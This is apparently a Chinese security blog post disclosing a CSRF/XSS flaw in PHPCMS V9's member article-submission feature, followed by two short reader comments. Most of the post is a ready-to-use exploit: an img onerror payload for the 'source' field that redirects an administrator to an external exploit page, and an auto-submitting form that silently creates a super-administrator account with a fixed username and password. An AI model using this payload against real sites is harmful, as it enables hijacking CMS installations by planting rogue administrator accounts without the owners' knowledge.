PHPCMS V9 文章投稿CSRF漏洞

CSRF导致可以添加后台管理员帐号。 在会员中心,文章投稿时,在来源填入: <img src="a" onerror="location.href='http://www.0day5.com/phpcms_v9_csrf_add_admin.php'"> 漏洞利用: <form name="myform" action="index.php?m=admin&c=admin_manage&a=add&pc_hash=" method="post" id="myform"> <input type="text" name="info[username]" class="input-text" id="username" value="tenzy" ></input> <input type="password" name="info[password]" class="input-text" id="password" value="123456"></input> <input type="password" name="info[pwdconfirm]" class="input-text" id="pwdconfirm" value="123456"></input> <input type="text" name="info[email]" value="root@0day5.com" class="input-text" id="email" size="30" ></input> <input type="text" name="info[realname]" value="tenzy" class="input-text" id="realname"></input> <select name="info[roleid]"> <option value="1" >超级管理员</option> </select> <input name="dosubmit" type="text" value="yes" > </form> <script>myform.submit()</script>

2 条评论

  1. gst

    :!: ,这个叫xss漏洞稳妥一些哦,其实直接使用xmlhttp发包就OK了

    1. 0day5
      @gst

      感谢提醒

发表评论